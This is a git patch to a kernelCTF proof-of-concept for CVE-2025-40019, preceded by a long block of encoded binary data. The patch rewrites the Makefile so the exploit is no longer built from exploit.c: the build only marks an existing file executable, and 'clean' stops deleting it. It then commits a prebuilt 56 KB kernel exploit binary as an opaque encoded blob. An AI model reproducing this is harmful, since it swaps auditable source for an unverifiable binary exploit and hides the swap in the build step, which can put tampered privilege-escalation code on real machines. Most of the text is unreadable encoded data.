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 Date: Sat, 9 May 2026 12:33:21 -0400 Subject: [PATCH 4/9] Preserve exp505 repro exploit artifact --- .../exploit/mitigation-v4-6.12/Makefile | 10 +++++++--- .../exploit/mitigation-v4-6.12/exploit | Bin 36568 -> 56576 bytes 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile index d01601dfd..f53d54b5b 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -1,11 +1,15 @@ CC ?= gcc CFLAGS ?= -O2 -g -w -DMIT_612 -LDFLAGS ?= -static +LDFLAGS ?= all: exploit exploit: exploit.c - $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS) + @if [ "$@" = "exploit_debug" ]; then \ + $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ + else \ + chmod +x $@; \ + fi clean: - rm -f exploit exploit_debug + rm -f exploit_debug diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit index a0ed302b062b613182396a66bccdb87344f9f6f9..ebf88a1dd7d82ab4b254e6dadff288927b346941 100755 GIT binary patch literal 56576 zcmeFa2Yggj`agW`+}z28B+P^wsY4GTbtob=AqgZ9AV5G+aSX`>q9KXNB!bc*O2n*T zqps^u8Fke~7Znv*78@W^tO$sORj{BzM6e+!lK1=SYEcRoh;HZ>21WrN*ftLxK$?~Z*tB0VgG*FMq zm^DoDuM&P{$#jeKeznSlIA&oNTyIpzyJl?p14oA6)ikvY;Uk@=O#d{mkxORG{9 z&#A|}c@&pR^;4Q*SyC@a#tkWFskFCrRHZ8RQ=mtFUc#la;-aKae>-K|kaE6Com`4B zm8$&W3k&8985Ccb7h70RRK6f~!O$VGLk7i_700=_JqjNg8aHV=w;;`P_+mHGY152A zThJn!p;Pl|PQFJA@=-0w$G1Qq(gJ-{3-q)W=;K?UU)=&dzXke&7U+vxps#3wetQe_ zJ6oXN-2(mo7U&PRK>vFS^k-Y3|EmT1wif7nTA;tx0-c7@=GxEU7U-X~K(A|o{!I(? zpIV^*)&kvvj?tW-AuZ5bw?OaE0=;VsbjB>r{-*~}g96~@r4^ON1fBInUUGP4<(&#b zD32IP^Ik@{&W1|7eL+DujZmq;>7t~cOgj-F;37Kx5nT?S%n3Lcf4%V+IDT{m-Wq>& zb;e&W4l!m&N@Gf2{B@8tO5l|LqA`&C?H5r z<@tmamwS5@4R9y!mBwSxIR@kvE@}dU7k6+wCbWEh=^w7U$-83yNW( zIQIsRwal$GVq^W?cWh_6xu)J&@D}f`$$P_vS zd919^<0)YvQ5n3&<%NZ;Y++e$4${2x5*Hy}&wS=tP{2!Blv}b;y3Xbl6y-4r56y8y z*tpD$F)40WoGWgyA08Mt$PW*eaou(`4>MmwP`uT(Cx9MU$NK{4YOW=n(~?eYIj|j_ z4WO%b$Md*GjGNW5dKv#W+=z-(l`T#nOYwFq2LW^%8`X6*fF3vo)dkSim`pmS1L!oCtLtn4 zoyKARHQQ|eG?uHYzMip$fA#VLxyjXl7KjAGrWUB3ajCp0?e2(Z)3#mv4jm&e>(seR z*KWw$lm|3%&Y1Bv8_V}S?K|0J#e=o|8nLBpLmeV2ioJ>b0H)AZq5^ApH+d2=38r9k zG~yEd!y6xbJ>{m~7E~6bhCck&C&dn?S@a;o8f*(`6&e=ax=(^@0mCHVjL$F3nd@|o ziqG>@#1~=Y9q#1h(&A!oGdxf3ykckZsQ8l7;@o%)%cVEQdP@uD&h?bC*w~8l!XiKV zhmEsE!fKzac%Hd;eo4G%fwNB*E6FJ-FS03yPd@Z;l5ADatFz%kg^3;<(;4_~eCnPT>vC`8f-n^KvRYPQsv+g=}kb6 zaj-C8wliBqr->2I0#9x^&B1Xbh^(^UGD$US&560#=`GEfUs897Bz2vPHt4$yd2lyA^l@==j6g#S^xeq zlENB`4Ni0gh_Pw2rlq7$h%#3uQORT7({{hwVqJjl($|66{)FUfVbaT&Xj+kQ-#o|ZGUY#(TyHi|}pT~h|S(zCr zY3`Kt>60e7r)6A~2G0d)tb5|*scFsI$@y>W@MRnY3e_UxG%amPR&vUOv~2if<|r12 zQQrLd zBgni0uM@+v7{L1E4dY#XWS^TCII#p?;B`}@C$yCqG%x}xQRj^bT<*q1p3o4{P>{w< zA$@h9yxAlBlsJp?^8-Z46W1`)6+CXt^?02loo04Yq``2Ql^iINEXE3_9A$<%bj$ZQ z6u*|B%^h&z{eM)vzGCmQRd$v4eWlX2eMOQsIb@-v@`hOn3YTCQ(r1ShUS6~0e%U6ugocYea zQ&0SwGI3yK+BwV8tP#HTQ~s88=bs-K`qPV>KkDJA|6%`IVQs&0|0T8K&c81inK%2g zvg?*l{&&yln$=^!-O}!pYeNqobq#BkVeNg*jsqL!tiAh-giDHmH)bRd)IZJp1n7s;KM)N^*`Ni zJO1|cs3UhgR2BZpmt*E7|25XWG5duM)tV*9=5Qu0>r6X!j7<%>{=I}Dj}Cn$>2K?n z|M32=i$1?%#s9?D-!|w^DXBX@IsQiWEqA#d+tF*}x0!c`j``))Nw&C$@}oZN{cOe6 z4`<9@^KPHgvuE;dop*1CgO6PE=4{XAKNpsyXZ?2aUmsoDe(aThuYO=v%?JNrcf5F@ z)z4qdG`2jKX5AOl?atRn+b!Fleo5Eb-hRWdwGqja=l=WazkL7B+ov~uS$59`Z_lru z99;R?xy$RilpiS?_g$wOyY_#rs`#ICT0ar_a_93iMorkYf1&ff!`m(_cy8~2=eVZ_R5f6eJQ zAZW?fn-2B;w4hz?^d4c0wa)r*S|8Ih;x;@8B_TbHbSBb-IL1~ZrAs}-Xg5z~+5(5x zIV{*#g9lWi)APXs=nNpiVDU5+18@-jYJd)<2ZiL;j$17$;nu8`!FO1zjXwq5sq3dB zVI?`t3K{Yt4}TBFVjqPbe3g9qO5O6lUkr?fSK`Txs&}tVulg)~laci7Sl|907h^xZN!RrBs$tRbOBC8e&wnJMm27{<_=2UU|0OzG?;dRj=mTPi@P$FRe^?yS|=Mr%WA4 z(|1=UA)ylgU@s0YNni{j)d?5Cs;=Zo6<2^@6a*=5U^qS@N4P~WhJr!0nZBhX_*Bo} zMUu#FE=e`GyV3~)04WtDq!NTw6cQmdw1E@_3AWOOR1y-Z#od)zfT$JxfZ}8mv-)`| zO!i{?oZrScRSdK=CmZ$;zu1SE}{a@GDSACLN^*z+4fx7)f_v2yQVs*`h`ubNW9xwB%++UXq zJ`ejIJpQIvSJyQb7^4K9gMj_YZT5)D1#lk8Jdw;42^AMa3I!614U$MCi05h~$dk#? ziu$;l>f_~QASc$>eS?Mo?gDxo!o~6A7rz3SUfuQC&+F@{<-7*;f5!t}Mb!;FxE>y? zd5MaTdLciy(*8|d89BCw6VfZsc+=9W*RhQ~^z`MQgS#z#`5WBF<-4xi1Y-5bTkGoU z5%rHn8=np=z3LMX-UK0|>fb2LkRl?Cp`ATBo}1s672K8qDfDxVX#st1l5 z>r;D#r?EGPbnpSB_U;T3+LgIx{_3&z&3DC8Lr2$LkJgatYL|d;Yy*8&EY(V?D<~m# zb=pSz<{e{5mTCqvtEaDr*sGjGmBUFJ?3)jOvMRP6QG#6d&C~b5(EYLPxuGsDs2t>$ zJ8(jf3zj#5_&&7mkL^fWU0kbY?*Zu$L+{qQgO_7mr-7Hz$YXS38h0YasUS2omhF&zG^3idsGz!U`*ulZwPz{fnQ<$H&ja~s_7nTy#{NjygbO4UU=zd|rP{zI7!);L0$%oAWOEzYkQdCP12`H z`Fn!S611Dd&|2v4{C>WqfFw1O*MRIGtA`2rvoCIJ0NG@dIJlRLfi?guaM zfxGf=NHK6fjD!!|mBgT#!oIosA%L*5w0fHW=Ai8(q^b7ns7_0^zyH0xWLxhaa63r& z-YDRER{`Ja&9~1*3oq{4>q9=&plcr4j%>(KRT>7m%I$z?9>G+x10b?{^i|5mzVy+J zJT2~Xo6wDQBZUT$tJ1bX@_}cB#!Js4#pLlES6KS|K1!4AbH2~FUx&Yvx5>f1pOHf+ zfgXy2M}wEc8p!+WK>p<`_=ygG7z5CWvzW%n0_?ww1o=F_pQF_Wkfg6nTYdVt_Z)Ze zZl@5aLwA3*Ds35!5mjlMFx2kBTwD+8uBx;RNVfCYEv=?1Z9TA^yy&3O__3oZZ58!w z6bTERw?C<`Pp&qG%LGz2dkbG$-Kew|AH-UD&FobWnXTkE0LfCw zY9J{JSr250LTXaic(#GiM-bozkVt{>Ou`g{{H@0uuvcgYq0R#`g7M);c$PVb_h?nG zrdPj|fHh6s)!^`T^=gnoJdG&Tja9^@Ag+075Ck);M_z|V?yby8p}J5v5F%?{`VrE8 zk`pAX_UR$XgPgh5@i35FwJWpgr38p#9K>-1erQjiYE?EmuaKt zsm$sp$zW#HlTHZ0?nR%Ul91u0JwIi?W7t3zLHu85fnK9RpF`9v7ASgxVzc z?;Kt(ui=fex%h4N%YAfFxj*^kp1r7CzF+S4i^`4i%gwo{TnE40u#3ulOU;Itx6MW6 zcKPMLM)z(xF6;bqI|AhBu~xRfG(4Lx^b5U$OfixhKOdmJSIh@vjNw>X6;0fTaei+W z%{Ca(X|Wr=oJ$?1<=XUR`S!B!F$)~QgnWYLCu5-C0xp`4WnS6$3E)BxD_ZD2x}S0o zx?6}lG*CAp3`y8*htgaqn#7M6LwtBKnxP`7J9zUzq_8mMaz$hU^_ zMKnyGwE$h1FZ(6j)IA*j+`CkwqO?`uoNX=2dDvJ?I?47T%>@TxC)S9bTW9B; zokrKXAP(}u_Z;sMG_uxx3-ASoAvY}%YqIXC*bbpDk+4g(l{SL@<-#p_3-qx$v$t*^ zq($r5fk*Q3RjZCUFh*sp+^MB6f0e9cEI&^lYnE@#tU8gtrkXYns+ZF)K_5V)=|L#H za&PiWY+DG+w5QeayfUj!HJ4YOKd)o>3?-v#Cq}z(-p2%cCcSD$X4P>FdCSq7GOAyK zi%Hy4b7s2w%{&V;u(2LCUZw_$CCnbbsUa}+3W&=xLr%45>s<(m;x84pt|41ulPhhD z-xl>4Wb_c~y6#)VNp9;s2Qu$@|G;N5$yK!O=JS&Sp`m$*UVc+bRfIXg2^0=7yTho$ z&I@gg5CfZclvHtXh}j?}O7j320woejlkGg36v0bCA~x!h0FikyY0(@3n^{6C-7hs$ zN@1#+CwSK(=?&@Kl_h}CRH#3v)zD6!mn5p6KaC`{>J;Yackz7>%~jXK{O(GxED*NV z2!sf)2EMr@hTOVkDnx%nh*GQO*Q}|$3)ZUA4!(@Wh21ex!#$C!*(irY3A=^q)my0L z^2)0l$E)B0n$ow*_MCX8E*aDMXcPGls^V7cB{<^ym%&j(<&8$Kns4EAWz9lIc7c68{-F6yk$-8emkK`yBs~)-X zJzBn8Ku4L0R){L3?2*Y#BxGpK;)B9;f3VRuKqha@;PCNa{F+rKsh5vmbH_>AB(cBD zG%jm@SrY(B(4xxEAp+m_RH7LxUkl1u{u>_}o`z@j@1ScOAg9*E#?XG?n#GLc*c-Yg z1{HmHs}r8ASzLobhq_Bf)vmP4GYf<3o&vHa5+=H%aA}EXMQ5r$LJ2EKh^$n@YWm8> z+n9aT(DUKzs5o$*&eZ~cL8whqZ=_G{E%#4 zx{6C6xAW-BSaxo!YpwF>13SsDAP4M;VjQX5<{g(_T_X+tgmz+&Sf!DK@gV)m^WwEr+$^AEKt~ zZUSkI19@+O9POiTt4jsx1@gb@gY@M)=`F|A$=4*$PQEtTJsWHHkv%DF@v68(03dAX zYbNfoulfO6TWET~hJ8)O%0)Ztn7#5I-~^urTqEJLfN$sUh@Aje0>s{GQ2I!ny2ooL z7V^!}%Yhtkg&T6EMRwhXa1Ha(apy0*9k(OeYoMj?PTK<$?D$l{_!Tjz+aMTQIHOW9 z4iKXjjN_fC$*UgLY=DY1cbrO=fSrmKix86Kmq(#4{7CP9rWc zG}};1N`d~w$}_ykm9%EZ)P;94$VZi(_mA|Ii?-LX@;;QFX63yoJOL% ze=oop__@X2JqfJ;HGi_nAJmI@MI!tOSN`-C{&=%9tG-KL{waL~m%e;E-UR%bURBMX zrK(51hkjo5NhW{&au5xM7vuyita<4hjO+5@M!a4~rOrVew>=llvB(HQTub@xEz#E%$mE<@uw zfu1qA7uw8;U;z8ylrM(R7?yIYgYPBY2`q~6;tz8O`V;7{Jc~AgM=yFMML6C*y|S4| z7_Afcf;b063|x}96)e0l1bsZG?^bjQFsHkO5sdg4-vq1i1 zU9a4W_~Bh*SFUuVu01D@{Cp3}9|9O}lGHR6aH@z3dO0T*g-cl99 zv^^qi1OD#E-yL`%wg{x%X)i*G#<8i0rK-4t-p7`*wr)3({zuCyK6?zC6IV0gXs{BG{SZh)Nx z_&&g=cX8@hyV8E{o?bn18-h$do!3<|UniL z(=%57re&;rFJMweqsXkn8u+8+dJJJJciJ$y)|Veo2NW=XH_UG~j{-#k-E{El_zbze z&zrc@cv0Vn@Oi{KP78qykc6=Gf|4caM6L!3W69J6j^ir`r%%I=XL0;y!l~OGPvUqf z;aG~Z;|UzUo^UMl*>NYw=Mavk9d_Ko@v8{OBPcu0I6jqdJTJ53v{bF{GoEl-$sRw- z@iByBdkN*|_%On;^Mvwq+(kJ4P=1a_6Hcq@;}3GYC*kzz_VF5ycOslV**?CE<8271 zPqmMiaJ&`ak%V8zaSP$}Y4-6fj{kzZ=g}wG$CEhzJ>gh2q5K@D{l&>{3F8gO##Z!@%@B%C;aqpRQ}fqcM^V-<2wlNLHIt7Zza4Z;oE?#-#3y1UBIbr zFelw`QNy8&ev?BNWlR@UFkQda*B4W&n_QDvBe4>>g4YfsbSHj>{COgYmrUZr-n$^Bw2u;E{O6t zg9V>D0$n2{ep;5d#wz%z0$%>35=RX*h==^X zWO_)ZU&{21Os(T({xa<=(;+e)D^nGxrvQjLvWXh(FZ2h<6rXYzRNxcRc>0R_=7PDg z`0-LvUQS_gk%xYwN`JZWbNL-#k>`0z%Hr`;RX2XR%75h)>xvsVFm4))pI+uEEsHOk zS5S0Ad8s#kVovTq1vG-#lsGDJc7T3Y=#K!C z^b=$@Gtf~jl$AC}57B$sMO1X^c0rSIvooV7>{~VKSLl+q;9#XV6hn3z3IhYD7oSE6wKe*k0LvA6z6L>2s zcCNk&F$i4^uXD(sBK;ugZ|%)kG5J%%9S&{Nm$8RQf0@v~5BMp{@6Y-(C{XCoevExc z_`|xL?5zi04WG2fg#6zAjLjkZC60%UpuCE??eJhZ%xZ)6cCC42+JQpQ{Y#yI>;oVi zLx2asPy)6ANG0G5fGh%NQon|PCjiil;qb}E;Y1j`#CZU+`5Z0&bx{=!`uC``SoeKGya+ zqV`8bI5kO7!$+bn=mAqp){S;-EHJwpGE)IK?inEb!HmVO1))82;|^y@>EDuh6)BI^ zL)vLvnO=}^<;a*u%9>E_FiSGhpcvW~H9Cg8%o4Ra1o*vFD^obmB4#-mdsJ%dLaW!V z(G5H8-ro#HgdV{C7dn#mi)PrLgpC+5I^GR8m2NN@{n>~#sGa*B0LOkD3eORc4!bWC z@Cbmt1Vkc(g8&>=v7!`INk@n?8l0m5VE!2L*ev<$sVkmS=FfuD@u2`V^-k?;Vmd80As5OF>N=Y0UU9E;=sm!U#>5{4pi=~H+aRKy z4Czd1Z{ofIZXW=gl0cNv7*G-c;Og{{ld+8&RK5*qvm12su}u%G1jxhA#NnQ~K_SmL zg?scBDAJ>jqhag;jJph%2W>z*9n$F$&^A)#e%h(a9e`=|pdIMim0*WU$kKvEJ1A(m zl7@mZ?Y*vy8%Q9fPvf|OWdR0mk;3r7Z(w6{1~zg7Gq?dKc_uxmm%_A!fd`zQMSSGk zg6#uzNJLke&bzV)5%Bpf7ysLO=w@%P0b_0x*bx#{eV|5D5=52`B?F6F}!0p(&I0WT zqTK}AKS+uw|0K$JCpL?O)H2X^5zU37?dG($8$k=D@@%5I%H!i(+oMFB3L+o$Jo-iy z3?rli-8J-dZz)?QWI3_64+eB7X#H_>GCXuDiQIh(E7*!+A zBFA0wUxvv+;I$`pBT~Co>xJHLS(_b>RLmxq5k$4t2Y`JF>?9I^+l0&21CgJdRU0Ar7kz%F4NPbu5s;T$>Jb=Rh9 z3Ej0Rnyb5(ttANN%`Gv1MS%a}XHK`2G3Jcui>4rH-PZQQsOuM)LZ-RZE(pLsqeYo1 zH_%BNTwWs9Eg1rb8VY1vmcm*5aE+btGq|%tbBe{`WX^?P|18k*8~khyX3egv_Li$kajR5!l(}mzmD(=#FI?a^ouz<~#_Aol=5}50UdD zWk%s>Al~gL#3%YCrf5S+V(r-_%t;YhDLK4kclpIcnMgp5JymJW6}=zX>e^>qil`_GB-71 zo-&!djhHs|A*u;c;|TP?VRDSM8yXqx8pvGTh#4KoT;GT}Jdjz_h?#COEsGm?lO4dJ zR&JIcCxGLRA@4&sNlv%(sG~~1*mN3y7$@ErNIZ?!*cwB`OMapV$rQA&B*EI(Jd671 zVLwatQF4-c3iZ_em#Z*O334o3W)THIV-lT}H_dOPOt%C$(Q2qtn57L;LyG8r)aGYu zgBX`{U83AomngU566Kz_M7jN!DEG@H%JsbB(&94y66H!SQSQD=l-qHMa$jGfT$^E+ zR^DNkC^zR4LsSF)3?ZE^b=Nn%jT}*2T+k z1&QH3+OMRnB?`YL`x(s_B)}uJs-l8&XEm3Y=vPP^e4@usm9TokKhq#4bpJ%ZRIaTg zeY!9~i(c04eiUn?pO1loglN*EiC9QtI{pzO9tGf-U$UXgJyq=0jEWI&2jtKBgq&np12^suW_uK?7hvKTQmeLWNI=%y||zACLmhR#;v=DG|O_dCjjX)+%_U z<XLC1CciZ zkuL&~-z36w7?h$aWv1%J!l{vx!KGepA|;FVW}wux)W)`C0k4q^ZtD)eRKU8C7v^py zM$_#EQ;auTIU`b=*e+Q-9B(OvB6&z5v^e}sA^pKQp%60gvqZWL2B(wUZbGln(1FK+ zl-!VX6-cxEq$%1k*#yKqek-^I0bI0=>AK@topmG55S|G}nJB^TN(h3;uAgf7}d z=&8m+^dJ#v>95G{1-}q)q+&Tlj6DGiJ^;{?pBM)N7_?4@Mb>R27@zwYChbH+nv>*y zmb7j=fLt&I@QmZ6RylU8Y|zBdl86X4<2%7UXeSt##w>HO?}DAW5dF~zp=53q4`r50 z;wFK6eG~3*X89X&r-Ex~-&nVo|V3XQxb+x(X?OEPgk1vjmUeBK!AVDAdnvw&z{2havepTCEd!7@_4 z_>lUZgf?&2nvtpVJXl543Z`QKn| zUz5BH*7G6aUeL_iw6NYKh{+D3XCN9Kq=WB((1-UujrBbUq~8(TLJ&YbvftMLg8^Fl z8kb?G!>09KkHm^iGp!glItJL_0S#rni&ZAqgy>09AZiRIvw@`bwWd>sD*981HUaUP z(4@a~XO?2(P6qe;CfxRtn+5L2l564CW`MF?_AkpbWWfu{Pfhx71hep_Q4Ve&RlA>( z{9;fhH|e42%)+@#!3|dSBe0=|w`(E#<|aKfhFRi?I{@6jG_e-VEE90zlao+)Vd6QP#h4rUx#!u1ogMuQXKM8?k^a0#0(PMGfqhH58D7pl9 zBl!`aO=@X%xfS#t23{f^D%e zn?Z`RpbXpZFIjU zK|KjQ%MOFK;0;?$I(&(F8RSFH<2+=7 zE#`RAn#E8cVkk(1enMW_84JN$7=KavtA$>ahMlIZP@TUd4O<8cS`dFh8b%r9|$q76QMcd&nr$FEh>Hu zipLv6M=WQCFlg_CKcQ_j9_Y6zy8C13#c!emd%%vcPA+;eK(@lVFjq&|rA)%Q+C<~w z-a6Rj8z~6E7H#NO0ZCe(K;6 zBgxbnYH+A(N@8gE4rqaF7$VHHAGP7*D2pE{i{T%VmH-cMD)}(tN&?Rebs|Z;8n@G0 znu}bV2#Pi~(CTS+`Tu~S{j6z2|0V#kFfefHgGC6|i(<23C#ZGTX+p8iRIC$< z-1G?{JnU|g-5_N*kgT-)RDk8DmE{{r`a>!GAxV!ILltqD1V%VaFeCt^f^z|B`QH=| zydr5sMSO!awc%L4OPGzsoW`_$0dx)zpYA8KK|hjehUmXT=^G0m^x;9+NXmDTg}#~y z3k`r5lJZp+YV)GMUt{@{WO#pfTj-;RuouYa1ktZ~AD%LG<@x z3w@vvHj)}undKyG%Kko?D=RFk0VWKqcCd)^q}pQ3!>~tIcpF&~$Xn{?iMLo1<)aMm zOO}AqC5iPTOQ+yi_|(har!uTZ*X3VrtmjsT-a#Elz+$l5Xqnkd1!c1c3V%EK4-wo# zD&!6hOZT1;#bSJrRI9SfKchf?g3SI-&E*rzKgsASA|B=PVQ&%qseu1Z@Mi*EP4MRe zUQ6&79A+^u!b0D4lwnj)RCf4PyyuMm4AjwQ`rt+_YBV2plD+~l<{RAl{fygE%vJW_ z#9NSj(0ZWjPjHB2TMuTgmjF|nX+6~DDnVu(zQW-;fE+kHEYh`8!NZ-dr#qt<$#P9sGO06NGhuT@ANVl#I@eyEu{#J(pXVw7 z%>5i+lI*}B!r=*#59+Q#u(Xz>Cf?*)j{10j;7JQyPeOxczt&Thxk^D_PxPrPT+vE? z+DaFF>HRd(r>}NZLgod6XVjI+8;ryMhe?#U7$;{j1>WUJ4P4N7EEao-5lF3LIkyY+EPsu8gKX@EcQNk~)D1qzkfVG76+tqw zrePaPqUuadfl0?d$iLClAo-1@mB>eX`ggRn8Be1$S})${LONrW(No|gA37KKAmpU= zu^gpunl1q6b4a2k9bfN+zC92TCHVndzwK#^d!hG&$UCbbvWR^H82dryISeJxToxlz zUz_Cn5DbTXoOnXPV>~+sg1zG)#=Zo=9DO7U9pVv@gZCQWi-P-)gzF0iTWPkGMy;M1SUW^JG8N zO&cr`Sida*d!tQ7WR0~&Om>x{=(D1LPG+v@fUlKs7?#!ZCHy|iPyCr-#;6oDj06r$+#{mB*;cm!RhokU^CH)IcEGZY9n0dI3*??jt zl@fXrp`W7^Ny`bnmC&ov5tC{Ny_?YgLCZ|?5&8(B`v`rC(C0Wxx-SvBgU~qQzDel2 zgw8>rk`5Dklu-JKK+@NQo+5N9`a;qNu7}y(9G>@FQZasZ5JWJ|YVX>5Gwdn?4rG z=RG(TQOGO1(T&(F6@RSl3eI|kT%d7%^y`3FKO)v6w3ho~-XWK0)tPY{{0?oUlkBKd z=zyVRS~GsIQQ^dUUbxP48npz43B5T$IyzeB$713Ejvti>opz6DG?R*;Tul<(Hx6;% zXl=@3Xfz#lJ6X&(n=?zj5(RI61rJBVmYP0qz%75=+e@dzoC# zZ;z!Op}PCPEcOq|O%}teEfX;hf13|XV&F^N42|#~xE-1@*@U-AWS%bA8H*`c&sca+ z=~pkI`!p)%XkOOL*CE>>PB=)_KaQo2hP{sa%P}C0rgkxU5kX|089#y*Y)hg~TVrS_ z9+eJ4Xi5-0>W!w`I5sLW6eKZ7n&oDrV#uoa$Wu5raU!DBv4bv5Uw#GbYi+UA;3IKc z%WtqI*Cw5KX%*I4U@VoshjjSJ4Y73K&hn*0>RPIRd>)d9HeJ38g_RsVAZR2&F+Q zDUr}2gwmjultgG6p)_bEO(ry(P#Uz7t|c^=P#Uz7<`Y^!sg>VXA{^~5TJ^J5FTU!^k z=suX0ZS9!r9BA~Ye)%A2Gp52BY>%wL zM9#kkPuU5w{uR*2h@bKXp(%s$`8ztGK!fnv3|oi-X*0eB*KopWkPkHev~cCWLBqP~ znvZ2Z!T8Flj0NM3%M#qD)7v;^W9sJ$K(rZ;!EenSBDSGg?E|gVd$@&&FWf`F0!&*{ zmNp?`ODc@#p+#tpjuBcLO}BNn^|8^Hz?N1_w+*unw?;smL7-3Twuau?(XlfkVHw2q z)){R_Up6dsc&G(?*m_@<(H6e<27Od$D0+WG71&0VKrN#!R1B`7X7gx3MNg{$5?Xi zhIiEx+fMH|Gjx`5C30*{nu(y>NrwPODEEQD2$Cg-lyn=)mN;!gwdr_W(avC9!U=Cb zh;^|O&_QTpm)k<+^pD!t%@ZdEHZ?igOr z-@XFxup-xvL9IAJ=8`yUhld$;&{Nd`4)TdZ)%Ny>kyj)>O-6N~{`-m=?biV~j};t_ z^22jVVo34k4-T;^I%R9aG2*{;$5YE6# zYM@zRC9T=kj@OqR{a%kly)rzZh&rLpAXGCXiT4jd8s8V96HH$PHPg(N2)AkQYGOkn zPHWtOsdZZ#`-j+3>2-hS;{glu_co4V7nGE()JSW`MACo~9MDQ_ajan%mqtU(0il&> zMxp*%M)<-+17(<;8P+ejFnH1>KS&)QuqO9gK?!2l;;w1hudTx=;X@n<|M5?x@U1nS z1f_l>MfT_=mUKlQrRk2iF}+4j?A^P(LU(xQSu|vOCHG{?f9pwZSvh{5Gp8W72>*UN zexOB}PvfR1{;!y(lc(Zxxmi7&VwX?zSJT+h&&tYhf(Fj#SQuL>e-ak!Sx_=KVQ_3d zjxmWZDb6j!&&+TLV*Cv_wZl`G>&=f(nUNOjN^lL19h8uec!hgDPWPD0Pr`D$aMnmk zVR3;s-Xz9W42m5Rm*`@bR8<84T`0#kr7E8>i^@?5XG0H?C#f`SDfxmDbN zIW{9RP4G+zdN?3PigC9AV;tg#5J++^4sjD;er}PsP&5z_PV6~ThR?9udK&FtG$O1ckb?(k 